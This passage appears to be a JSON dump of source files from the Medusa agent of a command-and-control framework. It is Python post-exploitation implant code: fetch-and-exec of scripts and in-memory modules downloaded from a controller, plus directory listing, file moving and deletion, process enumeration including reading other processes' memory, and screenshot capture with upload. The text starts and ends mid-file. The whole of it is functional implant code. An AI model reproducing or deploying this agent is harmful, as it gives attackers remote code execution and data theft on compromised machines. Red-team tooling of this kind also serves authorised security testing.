self._get_info(self.repoName, fullname)\n                return is_package\n\n            def get_code(self, fullname):\n                submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)\n                return compile(source, fullpath, 'exec')\n\n        if module_name in self.moduleRepo.keys(): return \"{} module already loaded.\".format(module_name)\n        total_chunks = 1\n        chunk_num = 0\n        module_zip = bytearray()\n        while (chunk_num < total_chunks):\n            if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                return \"Job stopped.\"\n            data = { \"action\": 
\"post_response\", \"responses\": [\n                    { \"upload\": { \"chunk_size\": CHUNK_SIZE, \"file_id\": file, \"chunk_num\": chunk_num+1 }, \"task_id\": task_id }\n                ]}\n            response = self.postMessageAndRetrieveResponse(data)\n            chunk = response[\"responses\"][0]\n            total_chunks = chunk[\"total_chunks\"]\n            chunk_num+=1\n            module_zip.extend(base64.b64decode(chunk[\"chunk_data\"]))\n\n        if module_zip:\n            self.moduleRepo[module_name] = zipfile.ZipFile(io.BytesIO(module_zip))\n            if module_name not in self._meta_cache:\n                finder = CFinder(module_name, self)\n                self._meta_cache[module_name] = finder\n                sys.meta_path.append(finder)        \n        else: return \"Failed to download in-memory module\"\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/load_module.py3",
    "content": "    def load_module(self, task_id, file, module_name):\n        import zipfile, io\n\n        class CFinder(object):\n            def __init__(self, repoName, instance):\n                self.moduleRepo = instance.moduleRepo\n                self.repoName = repoName\n                self._source_cache = {}\n\n            def _get_info(self, repoName, fullname):\n                parts = fullname.split('.')\n                submodule = parts[-1]\n                modulepath = '/'.join(parts)\n                _search_order = [('.py', False), ('/__init__.py', True)]\n                for suffix, is_package in _search_order:\n                    relpath = modulepath + suffix\n                    try: self.moduleRepo[repoName].getinfo(relpath)\n                    except KeyError: pass\n                    else: return submodule, is_package, relpath\n                msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName))\n                raise ImportError(msg)\n\n            def _get_source(self, repoName, fullname):\n                submodule, is_package, relpath = self._get_info(repoName, fullname)\n                fullpath = '%s/%s' % (repoName, relpath)\n                if relpath in self._source_cache:\n                    source = self._source_cache[relpath]\n                    return submodule, is_package, fullpath, source\n                try:\n                    source =  self.moduleRepo[repoName].read(relpath)\n                    source = source.replace(b'\\r\\n', b'\\n')\n                    source = source.replace(b'\\r', b'\\n')\n                    self._source_cache[relpath] = source\n                    return submodule, is_package, fullpath, source\n                except: raise ImportError(\"Unable to obtain source for module %s\" % (fullpath))\n\n            def find_module(self, fullname, path=None):\n                try: submodule, is_package, relpath = self._get_info(self.repoName, fullname)\n                
except ImportError: return None\n                else: return self\n\n            def load_module(self, fullname):\n                import types\n                submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)\n                code = compile(source, fullpath, 'exec')\n                mod = sys.modules.setdefault(fullname, types.ModuleType(fullname))\n                mod.__loader__ = self\n                mod.__file__ = fullpath\n                mod.__name__ = fullname\n                if is_package:\n                    mod.__path__ = [os.path.dirname(mod.__file__)]\n                exec(code, mod.__dict__)\n                return mod\n\n            def get_data(self, fullpath):\n\n                prefix = os.path.join(self.repoName, '')\n                if not fullpath.startswith(prefix):\n                    raise IOError('Path %r does not start with module name %r', (fullpath, prefix))\n                relpath = fullpath[len(prefix):]\n                try:\n                    return self.moduleRepo[self.repoName].read(relpath)\n                except KeyError:\n                    raise IOError('Path %r not found in repo %r' % (relpath, self.repoName))\n\n            def is_package(self, fullname):\n                \"\"\"Return if the module is a package\"\"\"\n                submodule, is_package, relpath = self._get_info(self.repoName, fullname)\n                return is_package\n\n            def get_code(self, fullname):\n                submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)\n                return compile(source, fullpath, 'exec')\n\n        if module_name in self.moduleRepo.keys():\n            return \"{} module already loaded.\".format(module_name)\n        total_chunks = 1\n        chunk_num = 0\n        module_zip = bytearray()\n        while (chunk_num < total_chunks):\n            if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n  
              return \"Job stopped.\"\n            data = { \"action\": \"post_response\", \"responses\": [\n                    { \"upload\": { \"chunk_size\": CHUNK_SIZE, \"file_id\": file, \"chunk_num\": chunk_num+1 }, \"task_id\": task_id }\n                ]}\n            response = self.postMessageAndRetrieveResponse(data)\n            chunk = response[\"responses\"][0]\n            total_chunks = chunk[\"total_chunks\"]\n            chunk_num+=1\n            module_zip.extend(base64.b64decode(chunk[\"chunk_data\"]))\n\n        if module_zip:\n            self.moduleRepo[module_name] = zipfile.ZipFile(io.BytesIO(module_zip))\n            if module_name not in self._meta_cache:\n                finder = CFinder(module_name, self)\n                self._meta_cache[module_name] = finder\n                sys.meta_path.append(finder)        \n        else: return \"Failed to download in-memory module\"\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/load_script.py",
    "content": "    def load_script(self, task_id, file):\n        total_chunks = 1\n        chunk_num = 0\n        cmd_code = \"\"\n        while (chunk_num < total_chunks):\n            if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                return \"Job stopped.\"\n            data = { \"action\": \"post_response\", \"responses\": [\n                    { \"upload\": { \"chunk_size\": CHUNK_SIZE, \"file_id\": file, \"chunk_num\": chunk_num+1 }, \"task_id\": task_id }\n                ]}\n            response = self.postMessageAndRetrieveResponse(data)\n            chunk = response[\"responses\"][0]\n            chunk_num+=1\n            total_chunks = chunk[\"total_chunks\"]\n            cmd_code += base64.b64decode(chunk[\"chunk_data\"]).decode()\n            \n        if cmd_code: exec(cmd_code)\n        else: return \"Failed to load script\"\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/ls.py2",
    "content": "\n    def ls(self, task_id, path, file_browser=False):\n        if path == \".\": file_path = self.current_directory\n        else: file_path = path if path[0] == os.sep \\\n                else os.path.join(self.current_directory,path)\n        file_details = os.stat(file_path)\n        target_is_file = os.path.isfile(file_path)\n        target_name = os.path.basename(file_path.rstrip(os.sep)) if file_path != os.sep else os.sep\n        file_browser = {\n            \"host\": socket.gethostname(),\n            \"is_file\": target_is_file,\n            \"permissions\": {\"octal\": oct(file_details.st_mode)[-3:]},\n            \"name\": target_name if target_name not in [\".\", \"\" ] \\\n                    else os.path.basename(self.current_directory.rstrip(os.sep)),\n            \"parent_path\": os.path.abspath(os.path.join(file_path, os.pardir)),\n            \"success\": True,\n            \"access_time\": int(file_details.st_atime * 1000),\n            \"modify_time\": int(file_details.st_mtime * 1000),\n            \"size\": file_details.st_size,\n            \"update_deleted\": True,\n        }\n        files = []\n        if not target_is_file:\n            for entry in os.listdir(file_path):\n                full_path = os.path.join(file_path, entry)\n                file = {}\n                file['name'] = entry \n                file['is_file'] = True if os.path.isfile(full_path) else False\n                try:\n                    file_details = os.stat(full_path)\n                    file[\"permissions\"] = { \"octal\": oct(file_details.st_mode)[-3:]}\n                    file[\"access_time\"] = int(file_details.st_atime * 1000)\n                    file[\"modify_time\"] = int(file_details.st_mtime * 1000)\n                    file[\"size\"] = file_details.st_size\n                except OSError as e:\n                    pass\n                files.append(file)\n        file_browser[\"files\"] = files\n        task = [task for task 
in self.taskings if task[\"task_id\"] == task_id]\n        task[0][\"file_browser\"] = file_browser\n        output =  { \"files\": files, \"parent_path\": os.path.abspath(os.path.join(file_path, os.pardir)), \"name\":  target_name if target_name not in  [\".\", \"\"] \\\n                    else os.path.basename(self.current_directory.rstrip(os.sep))  }\n        return json.dumps(output)\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/ls.py3",
    "content": "    def ls(self, task_id, path, file_browser=False):\n        if path == \".\": file_path = self.current_directory\n        else: file_path = path if path[0] == os.sep \\\n                else os.path.join(self.current_directory,path)\n        file_details = os.stat(file_path)\n        target_is_file = os.path.isfile(file_path)\n        target_name = os.path.basename(file_path.rstrip(os.sep)) if file_path != os.sep else os.sep\n        file_browser = {\n            \"host\": socket.gethostname(),\n            \"is_file\": target_is_file,\n            \"permissions\": {\"octal\": oct(file_details.st_mode)[-3:]},\n            \"name\": target_name if target_name not in [\".\", \"\" ] \\\n                    else os.path.basename(self.current_directory.rstrip(os.sep)),        \n            \"parent_path\": os.path.abspath(os.path.join(file_path, os.pardir)),\n            \"success\": True,\n            \"access_time\": int(file_details.st_atime * 1000),\n            \"modify_time\": int(file_details.st_mtime * 1000),\n            \"size\": file_details.st_size,\n            \"update_deleted\": True,\n        }\n        files = []\n        if not target_is_file:\n            with os.scandir(file_path) as entries:\n                for entry in entries:\n                    file = {}\n                    file['name'] = entry.name\n                    file['is_file'] = True if entry.is_file() else False\n                    try:\n                        file_details = os.stat(os.path.join(file_path, entry.name))\n                        file[\"permissions\"] = { \"octal\": oct(file_details.st_mode)[-3:]}\n                        file[\"access_time\"] = int(file_details.st_atime * 1000)\n                        file[\"modify_time\"] = int(file_details.st_mtime * 1000)\n                        file[\"size\"] = file_details.st_size\n                    except OSError as e:\n                        pass\n                    files.append(file)  \n        
file_browser[\"files\"] = files\n        task = [task for task in self.taskings if task[\"task_id\"] == task_id]\n        task[0][\"file_browser\"] = file_browser\n        output = { \"files\": files, \"parent_path\": os.path.abspath(os.path.join(file_path, os.pardir)), \"name\":  target_name if target_name not in  [\".\", \"\"] \\\n                    else os.path.basename(self.current_directory.rstrip(os.sep))  }\n        return json.dumps(output)\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/mv.py",
    "content": "    def mv(self, task_id, source, destination):\n        import shutil\n        def _resolve(path):\n            if path[0] == os.sep:\n                return path\n            return os.path.join(self.current_directory, path)\n        shutil.move(_resolve(source), _resolve(destination))\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/pip_freeze.py",
    "content": "    def pip_freeze(self, task_id):\n        out=\"\"\n        try:\n            import pkg_resources\n            installed_packages = pkg_resources.working_set\n            installed_packages_list = sorted([\"%s==%s\" % (i.key, i.version) for i in installed_packages])\n            return \"\\n\".join(installed_packages_list)\n        except:\n            out+=\"[*] pkg_resources module not installed.\\n\"\n\n        try:\n            from pip._internal.operations.freeze import freeze\n            installed_packages_list = freeze(local_only=True)\n            return \"\\n\".join(installed_packages_list)\n        except:\n            out+=\"[*] pip module not installed.\\n\"\n\n        try:\n            import pkgutil\n            installed_packages_list = [ a for _, a, _ in pkgutil.iter_modules()]\n            return \"\\n\".join(installed_packages_list)\n        except:\n            out+=\"[*] pkgutil module not installed.\\n\"\n\n        return out+\"[!] No modules available to list installed packages.\"\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/ps.py2",
    "content": "    def ps(self, task_id):\n\n        def get_user_id_map():\n\n            user_map = {}\n            # get username from uid\n            with open(\"/etc/passwd\", \"r\") as f:\n                passwd = f.readlines()\n\n            for line in passwd:\n                user_line_arr = line.split(\":\")\n                username = user_line_arr[0].strip()\n                uid = user_line_arr[2].strip()\n                user_map[uid] = username\n\n            return user_map\n\n        processes = []\n        if os.name == 'posix':\n\n            # Get the user map\n            user_map = get_user_id_map()\n\n            # get list of PIDs by performing a directory listing on /proc\n            pids = [pid for pid in os.listdir(\"/proc\") if pid.isdigit()]\n\n            # loop through each PID and output information similar to ps command\n            for pid in pids:\n                # construct path to status file\n                status_path = \"/proc/%s/status\" % str(pid)\n\n                # read in the status file - bail if process dies before we read the status file\n                try:\n                    with open(status_path, \"r\") as f:\n                        status = f.readlines()\n                except Exception as e:\n                    continue\n\n                # construct path to status file\n                cmdline_path = \"/proc/%s/cmdline\" % str(pid)\n\n                # read in the status file\n                with open(cmdline_path, \"r\") as f:\n                    cmdline = f.read()\n                    cmd_arr = cmdline.split(\"\\x00\")\n                    cmdline = \" \".join(cmd_arr)\n\n                # extract relevant information from status file\n                name = \"\"\n                ppid = \"\"\n                uid = \"\"\n                username = \"\"\n\n                for line in status:\n                    if line.startswith(\"Name:\"):\n                        name = line.split()[1].strip()\n 
                   elif line.startswith(\"PPid:\"):\n                        ppid = line.split()[1].strip()\n                    elif line.startswith(\"Uid:\"):\n                        uid = line.split()[1].strip()\n\n                # Map the uid to the username\n                if uid in user_map:\n                    username = user_map[uid]\n\n                process = {\"process_id\": int(pid), \"parent_process_id\": int(ppid), \"user_id\": username, \"name\": name,\n                           \"bin_path\": cmdline}\n\n                processes.append(process)\n\n        task = [task for task in self.taskings if task[\"task_id\"] == task_id]\n        task[0][\"processes\"] = processes\n        return json.dumps({ \"processes\": processes })"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/ps.py3",
    "content": "    def ps(self, task_id):\n        import os\n        processes = []\n        if os.name == 'posix':\n\n            def get_user_id_map():\n\n                user_map = {}\n                # get username from uid\n                with open(\"/etc/passwd\", \"r\") as f:\n                    passwd = f.readlines()\n\n                for line in passwd:\n                    user_line_arr = line.split(\":\")\n                    username = user_line_arr[0].strip()\n                    uid = user_line_arr[2].strip()\n                    user_map[uid] = username\n\n                return user_map\n\n            # Get the user map\n            user_map = get_user_id_map()\n\n            # get list of PIDs by performing a directory listing on /proc\n            pids = [pid for pid in os.listdir(\"/proc\") if pid.isdigit()]\n\n            # loop through each PID and output information similar to ps command\n            for pid in pids:\n                # construct path to status file\n                status_path = \"/proc/%s/status\" % str(pid)\n\n                # read in the status file - bail if process dies before we read the status file\n                try:\n                    with open(status_path, \"r\") as f:\n                        status = f.readlines()\n                except Exception as e:\n                    continue\n\n                # construct path to status file\n                cmdline_path = \"/proc/%s/cmdline\" % str(pid)\n\n                # read in the status file\n                with open(cmdline_path, \"r\") as f:\n                    cmdline = f.read()\n                    cmd_arr = cmdline.split(\"\\x00\")\n                    cmdline = \" \".join(cmd_arr)\n\n                # extract relevant information from status file\n                name = \"\"\n                ppid = \"\"\n                uid = \"\"\n                username = \"\"\n\n                for line in status:\n                    if 
line.startswith(\"Name:\"):\n                        name = line.split()[1].strip()\n                    elif line.startswith(\"PPid:\"):\n                        ppid = line.split()[1].strip()\n                    elif line.startswith(\"Uid:\"):\n                        uid = line.split()[1].strip()\n\n                # Map the uid to the username\n                if uid in user_map:\n                    username = user_map[uid]\n\n                process = {\"process_id\": int(pid), \"parent_process_id\": int(ppid), \"user_id\": username, \"name\": name,\n                           \"bin_path\": cmdline}\n\n                processes.append(process)\n\n        elif os.name == 'nt':\n\n            import sys, os.path, ctypes, ctypes.wintypes, re\n            from ctypes import create_unicode_buffer, GetLastError\n\n            def _check_bool(result, func, args):\n                if not result:\n                    raise ctypes.WinError(ctypes.get_last_error())\n                return args\n\n            PULONG = ctypes.POINTER(ctypes.wintypes.ULONG)\n            ULONG_PTR = ctypes.wintypes.LPVOID\n            SIZE_T = ctypes.c_size_t\n            NTSTATUS = ctypes.wintypes.LONG\n            PVOID = ctypes.wintypes.LPVOID\n            PROCESSINFOCLASS = ctypes.wintypes.ULONG\n\n            Psapi = ctypes.WinDLL('Psapi.dll')\n            EnumProcesses = Psapi.EnumProcesses\n            EnumProcesses.restype = ctypes.wintypes.BOOL\n            GetProcessImageFileName = Psapi.GetProcessImageFileNameA\n            GetProcessImageFileName.restype = ctypes.wintypes.DWORD\n\n            Kernel32 = ctypes.WinDLL('kernel32.dll')\n            OpenProcess = Kernel32.OpenProcess\n            OpenProcess.restype = ctypes.wintypes.HANDLE\n            CloseHandle = Kernel32.CloseHandle\n            CloseHandle.errcheck = _check_bool\n            IsWow64Process = Kernel32.IsWow64Process\n\n            WIN32_PROCESS_TIMES_TICKS_PER_SECOND = 1e7\n\n            MAX_PATH = 260\n       
     PROCESS_TERMINATE = 0x0001\n            PROCESS_QUERY_INFORMATION = 0x0400\n\n            TOKEN_QUERY = 0x0008\n            TOKEN_READ = 0x00020008\n            TOKEN_IMPERSONATE = 0x00000004\n            TOKEN_QUERY_SOURCE = 0x0010\n            TOKEN_DUPLICATE = 0x0002\n            TOKEN_ASSIGN_PRIMARY = 0x0001\n\n            ProcessBasicInformation = 0\n            ProcessDebugPort = 7\n            ProcessWow64Information = 26\n            ProcessImageFileName = 27\n            ProcessBreakOnTermination = 29\n\n            STATUS_UNSUCCESSFUL = NTSTATUS(0xC0000001)\n            STATUS_INFO_LENGTH_MISMATCH = NTSTATUS(0xC0000004).value\n            STATUS_INVALID_HANDLE = NTSTATUS(0xC0000008).value\n            STATUS_OBJECT_TYPE_MISMATCH = NTSTATUS(0xC0000024).value\n\n            def query_dos_device(drive_letter):\n                chars = 1024\n                drive_letter = drive_letter\n                p = create_unicode_buffer(chars)\n                if 0 == Kernel32.QueryDosDeviceW(drive_letter, p, chars):\n                    pass\n                return p.value\n\n            def create_drive_mapping():\n                mappings = {}\n                for letter in (chr(l) for l in range(ord('C'), ord('Z') + 1)):\n                    try:\n                        letter = u'%s:' % letter\n                        mapped = query_dos_device(letter)\n                        mappings[mapped] = letter\n                    except WindowsError:\n                        pass\n                return mappings\n\n            mappings = create_drive_mapping()\n            def normalise_binpath(path):\n                match = re.match(r'(^\\\\Device\\\\[a-zA-Z0-9]+)(\\\\.*)?$', path)\n                if not match:\n                    return f\"Cannot convert {path} into a Win32 compatible path\"\n                if not match.group(1) in mappings:\n                    return None\n                drive = mappings[match.group(1)]\n                if not drive or not 
match.group(2):\n                    return drive\n                return drive + match.group(2)\n\n            count = 32\n            while True:\n                ProcessIds = (ctypes.wintypes.DWORD*count)()\n                cb = ctypes.sizeof(ProcessIds)\n                BytesReturned = ctypes.wintypes.DWORD()\n                if EnumProcesses(ctypes.byref(ProcessIds), cb, ctypes.byref(BytesReturned)):\n                    if BytesReturned.value<cb:\n                        break\n                    else:\n                        count *= 2\n                else:\n                    sys.exit(\"Call to EnumProcesses failed\")\n\n            for index in range(int(BytesReturned.value / ctypes.sizeof(ctypes.wintypes.DWORD))):\n                process = {}\n                process[\"process_id\"] = ProcessId = ProcessIds[index]\n                if ProcessId == 0: continue\n\n                hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, False, ProcessId)\n                if hProcess:\n                    ImageFileName = (ctypes.c_char*MAX_PATH)()\n                    Is64Bit = ctypes.c_int32()\n                    IsWow64Process(hProcess, ctypes.byref(Is64Bit))\n                    arch = \"x86\" if Is64Bit.value else \"x64\"\n                    process[\"architecture\"] = arch\n\n\n                    if GetProcessImageFileName(hProcess, ImageFileName, MAX_PATH)>0:\n                        filename = os.path.basename(ImageFileName.value)\n                        process[\"name\"] = filename.decode()\n                        process[\"bin_path\"] = normalise_binpath(ImageFileName.value.decode())\n\n                    CloseHandle(hProcess)\n                processes.append(process)\n\n        task = [task for task in self.taskings if task[\"task_id\"] == task_id]\n        task[0][\"processes\"] = processes\n        return json.dumps({ \"processes\": processes })\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/ps_full.py3",
    "content": "    def ps_full(self, task_id):\n        import sys, os.path, ctypes, ctypes.wintypes\n        from ctypes import create_unicode_buffer, GetLastError\n\n        def _check_bool(result, func, args):\n            if not result:\n                raise ctypes.WinError(ctypes.get_last_error())\n            return args\n\n        PULONG = ctypes.POINTER(ctypes.wintypes.ULONG)\n        ULONG_PTR = ctypes.wintypes.LPVOID\n        SIZE_T = ctypes.c_size_t\n        NTSTATUS = ctypes.wintypes.LONG\n        PVOID = ctypes.wintypes.LPVOID\n        PROCESSINFOCLASS = ctypes.wintypes.ULONG\n\n        Psapi = ctypes.WinDLL('Psapi.dll')\n        EnumProcesses = Psapi.EnumProcesses\n        EnumProcesses.restype = ctypes.wintypes.BOOL\n\n        Kernel32 = ctypes.WinDLL('kernel32.dll')\n        OpenProcess = Kernel32.OpenProcess\n        OpenProcess.restype = ctypes.wintypes.HANDLE\n        CloseHandle = Kernel32.CloseHandle\n        CloseHandle.errcheck = _check_bool\n        IsWow64Process = Kernel32.IsWow64Process\n\n        GetCurrentProcess = Kernel32.GetCurrentProcess\n        GetCurrentProcess.restype = ctypes.wintypes.HANDLE\n        GetCurrentProcess.argtypes = ()\n\n        ReadProcessMemory = Kernel32.ReadProcessMemory\n        ReadProcessMemory.errcheck = _check_bool\n        ReadProcessMemory.argtypes = (\n            ctypes.wintypes.HANDLE, \n            ctypes.wintypes.LPCVOID,\n            ctypes.wintypes.LPVOID, \n            SIZE_T,           \n            ctypes.POINTER(SIZE_T))\n\n        MAX_PATH = 260\n        PROCESS_VM_READ           = 0x0010\n        PROCESS_QUERY_INFORMATION = 0x0400\n\n        ProcessBasicInformation   = 0\n        ProcessDebugPort          = 7\n        ProcessWow64Information   = 26\n        ProcessImageFileName      = 27\n        ProcessBreakOnTermination = 29\n\n        STATUS_UNSUCCESSFUL         = NTSTATUS(0xC0000001)\n        STATUS_INFO_LENGTH_MISMATCH = NTSTATUS(0xC0000004).value\n        STATUS_INVALID_HANDLE       
= NTSTATUS(0xC0000008).value\n        STATUS_OBJECT_TYPE_MISMATCH = NTSTATUS(0xC0000024).value\n\n\n        class RemotePointer(ctypes._Pointer):\n            def __getitem__(self, key):\n                size = None\n                if not isinstance(key, tuple):\n                    raise KeyError('must be (index, handle[, size])')\n                if len(key) > 2:\n                    index, handle, size = key\n                else:\n                    index, handle = key\n                if isinstance(index, slice):\n                    raise TypeError('slicing is not supported')\n                dtype = self._type_\n                offset = ctypes.sizeof(dtype) * index\n                address = PVOID.from_buffer(self).value + offset\n                simple = issubclass(dtype, ctypes._SimpleCData)\n                if simple and size is not None:\n                    if dtype._type_ == ctypes.wintypes.WCHAR._type_:\n                        buf = (ctypes.wintypes.WCHAR * (size // 2))()\n                    else: buf = (ctypes.c_char * size)()\n                else: buf = dtype()\n                nread = SIZE_T()\n                Kernel32.ReadProcessMemory(handle, address, ctypes.byref(buf), \\\n                        ctypes.sizeof(buf), ctypes.byref(nread))\n                if simple: return buf.value\n                return buf\n\n        _remote_pointer_cache = {}\n        def RPOINTER(dtype):\n            if dtype in _remote_pointer_cache: return _remote_pointer_cache[dtype]\n            name = 'RP_%s' % dtype.__name__\n            ptype = type(name, (RemotePointer,), {'_type_': dtype})\n            _remote_pointer_cache[dtype] = ptype\n            return ptype\n\n        RPWSTR = RPOINTER(ctypes.wintypes.WCHAR)\n\n        class UNICODE_STRING(ctypes.Structure):\n            _fields_ = (('Length',        ctypes.wintypes.USHORT),\n                        ('MaximumLength', ctypes.wintypes.USHORT),\n                        ('Buffer',        RPWSTR))\n\n        
class LIST_ENTRY(ctypes.Structure):\n            pass\n\n        RPLIST_ENTRY = RPOINTER(LIST_ENTRY)\n\n        LIST_ENTRY._fields_ = (('Flink', RPLIST_ENTRY),\n                            ('Blink', RPLIST_ENTRY))\n\n        class PEB_LDR_DATA(ctypes.Structure):\n            _fields_ = (('Reserved1',               ctypes.wintypes.BYTE * 8),\n                        ('Reserved2',               PVOID * 3),\n                        ('InMemoryOrderModuleList', LIST_ENTRY))\n\n        RPPEB_LDR_DATA = RPOINTER(PEB_LDR_DATA)\n\n        class RTL_USER_PROCESS_PARAMETERS(ctypes.Structure):\n            _fields_ = (('Reserved1',     ctypes.wintypes.BYTE * 16),\n                        ('Reserved2',     PVOID * 10),\n                        ('ImagePathName', UNICODE_STRING),\n                        ('CommandLine',   UNICODE_STRING))\n\n        RPRTL_USER_PROCESS_PARAMETERS = RPOINTER(RTL_USER_PROCESS_PARAMETERS)\n        PPS_POST_PROCESS_INIT_ROUTINE = PVOID\n\n        class PEB(ctypes.Structure):\n            _fields_ = (('Reserved1',              ctypes.wintypes.BYTE * 2),\n                        ('BeingDebugged',          ctypes.wintypes.BYTE),\n                        ('Reserved2',              ctypes.wintypes.BYTE * 1),\n                        ('Reserved3',              PVOID * 2),\n                        ('Ldr',                    RPPEB_LDR_DATA),\n                        ('ProcessParameters',      RPRTL_USER_PROCESS_PARAMETERS),\n                        ('Reserved4',              ctypes.wintypes.BYTE * 104),\n                        ('Reserved5',              PVOID * 52),\n                        ('PostProcessInitRoutine', PPS_POST_PROCESS_INIT_ROUTINE),\n                        ('Reserved6',              ctypes.wintypes.BYTE * 128),\n                        ('Reserved7',              PVOID * 1),\n                        ('SessionId',              ctypes.wintypes.ULONG))\n\n        RPPEB = RPOINTER(PEB)\n\n        class 
PROCESS_BASIC_INFORMATION(ctypes.Structure):\n            _fields_ = (('Reserved1',       PVOID),\n                        ('PebBaseAddress',  RPPEB),\n                        ('Reserved2',       PVOID * 2),\n                        ('UniqueProcessId', ULONG_PTR),\n                        ('InheritedFromUniqueProcessId',       ULONG_PTR))\n\n        def NtError(status):\n            import sys\n            descr = 'NTSTATUS(%#08x) ' % (status % 2**32,)\n            if status & 0xC0000000 == 0xC0000000:\n                descr += '[Error]'\n            elif status & 0x80000000 == 0x80000000:\n                descr += '[Warning]'\n            elif status & 0x40000000 == 0x40000000:\n                descr += '[Information]'\n            else:\n                descr += '[Success]'\n            if sys.version_info[:2] < (3, 3):\n                return WindowsError(status, descr)\n            return OSError(None, descr, None, status)\n\n        ntdll = ctypes.WinDLL('ntdll.dll')\n        NtQueryInformationProcess = ntdll.NtQueryInformationProcess\n        NtQueryInformationProcess.restype = NTSTATUS\n        NtQueryInformationProcess.argtypes = (\n            ctypes.wintypes.HANDLE,\n            PROCESSINFOCLASS, \n            PVOID,            \n            ctypes.wintypes.ULONG,\n            PULONG)        \n\n        class ProcessInformation(object):\n            _close_handle = False\n            _closed = False\n            _module_names = None\n\n            def __init__(self, process_id=None, handle=None):\n                if process_id is None and handle is None:\n                    handle = GetCurrentProcess()\n                elif handle is None:\n                    handle = OpenProcess(PROCESS_VM_READ | \n                                            PROCESS_QUERY_INFORMATION,\n                                                False, process_id)\n                    self._close_handle = True\n                self._handle = handle\n                if not 
self._query_info() or (process_id is not None \\\n                    and self._process_id != process_id):\n                    return\n\n            def __del__(self, CloseHandle=CloseHandle):\n                if self._close_handle and not self._closed:\n                    try:\n                        CloseHandle(self._handle)\n                    except WindowsError as e: pass\n                    self._closed = True\n\n            def _query_info(self):\n                info = PROCESS_BASIC_INFORMATION()\n                handle = self._handle\n                status = NtQueryInformationProcess(handle, ProcessBasicInformation,\n                            ctypes.byref(info), ctypes.sizeof(info), None)\n                if status < 0:\n                    return False\n\n                self._process_id = info.UniqueProcessId\n                self._parent_process_id = info.InheritedFromUniqueProcessId\n                self._peb = peb = info.PebBaseAddress[0, handle]\n                self._params = peb.ProcessParameters[0, handle]\n\n                Is64Bit = ctypes.c_int32()\n                IsWow64Process(handle, ctypes.byref(Is64Bit))\n                self._arch = \"x86\" if Is64Bit.value else \"x64\"\n\n            @property\n            def process_id(self):\n                return self._process_id\n\n            @property\n            def session_id(self):\n                return self._peb.SessionId\n\n            @property\n            def image_path(self):\n                ustr = self._params.ImagePathName\n                return ustr.Buffer[0, self._handle, ustr.Length]\n\n            @property\n            def command_line(self):\n                ustr = self._params.CommandLine\n                buf = ustr.Buffer[0, self._handle, ustr.Length]\n                return buf\n\n        processes = []\n\n        count = 32\n        while True:\n            ProcessIds = (ctypes.wintypes.DWORD*count)()\n            cb = ctypes.sizeof(ProcessIds)\n            
BytesReturned = ctypes.wintypes.DWORD()\n            if EnumProcesses(ctypes.byref(ProcessIds), cb, ctypes.byref(BytesReturned)):\n                if BytesReturned.value<cb:\n                    break\n                else:\n                    count *= 2\n            else:\n                sys.exit(\"Call to EnumProcesses failed\")\n\n        for index in range(int(BytesReturned.value / ctypes.sizeof(ctypes.wintypes.DWORD))):\n            process = {}\n            process[\"process_id\"] = ProcessId = ProcessIds[index]\n            if ProcessId == 0: continue\n\n            try:\n                pi = ProcessInformation(ProcessId)\n                process[\"name\"] = os.path.basename(pi.image_path)\n                process[\"architecture\"] = str(pi._arch)\n                process[\"bin_path\"] = pi.image_path\n                process[\"integrity_level\"] = pi.session_id\n                process[\"parent_process_id\"] = pi._parent_process_id\n                process[\"command_line\"] = pi.command_line\n            except:\n                pass\n            processes.append(process)\n\n        task = [task for task in self.taskings if task[\"task_id\"] == task_id]\n        task[0][\"processes\"] = processes\n        return { \"processes\": processes }\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/rm.py",
    "content": "    def rm(self, task_id, path):\n        import shutil\n        file_path = path if os.path.isabs(path) \\\n                else os.path.join(self.current_directory,path)\n        if os.path.isdir(file_path):\n            shutil.rmtree(file_path)\n        else:\n            os.remove(file_path)\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/screenshot.py2",
    "content": "    def screenshot(self, task_id):\n        from Cocoa import NSURL, NSBitmapImageRep\n        import LaunchServices\n        import Quartz\n        import Quartz.CoreGraphics as CG\n        region = CG.CGRectInfinite\n        image = CG.CGWindowListCreateImage(region, CG.kCGWindowListOptionOnScreenOnly, CG.kCGNullWindowID, CG.kCGWindowImageDefault)\n        sh_data = CG.CFDataCreateMutable(None, 0)\n        dest = Quartz.CGImageDestinationCreateWithData(sh_data, LaunchServices.kUTTypePNG, 1, None)\n        file_size = 0\n        if(dest):\n            Quartz.CGImageDestinationAddImage (dest, image, 0)\n            if (Quartz.CGImageDestinationFinalize(dest)):\n                file_size = CG.CFDataGetLength(sh_data)\n\n        if(file_size) > 0:\n            total_chunks = int(file_size / CHUNK_SIZE) + (file_size % CHUNK_SIZE > 0)\n            data = {\n                \"action\": \"post_response\", \n                \"responses\": [\n                {\n                    \"task_id\": task_id,\n                    \"total_chunks\": total_chunks,\n                    \"file_path\": str(datetime.now()),\n                    \"chunk_size\": CHUNK_SIZE,\n                    \"is_screenshot\": True \n                }]\n            }\n            initial_response = self.postMessageAndRetrieveResponse(data)\n            for i in range(0,total_chunks):\n                if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                    return \"Job stopped.\"\n\n                if i == total_chunks:\n                    content = sh_data[i*CHUNK_SIZE:]\n                else:\n                    content = sh_data[i*CHUNK_SIZE:(i+1)*CHUNK_SIZE]\n                data = {\n                    \"action\": \"post_response\", \n                    \"responses\": [\n                        {\n                            \"chunk_num\": i+1,\n                            \"file_id\": 
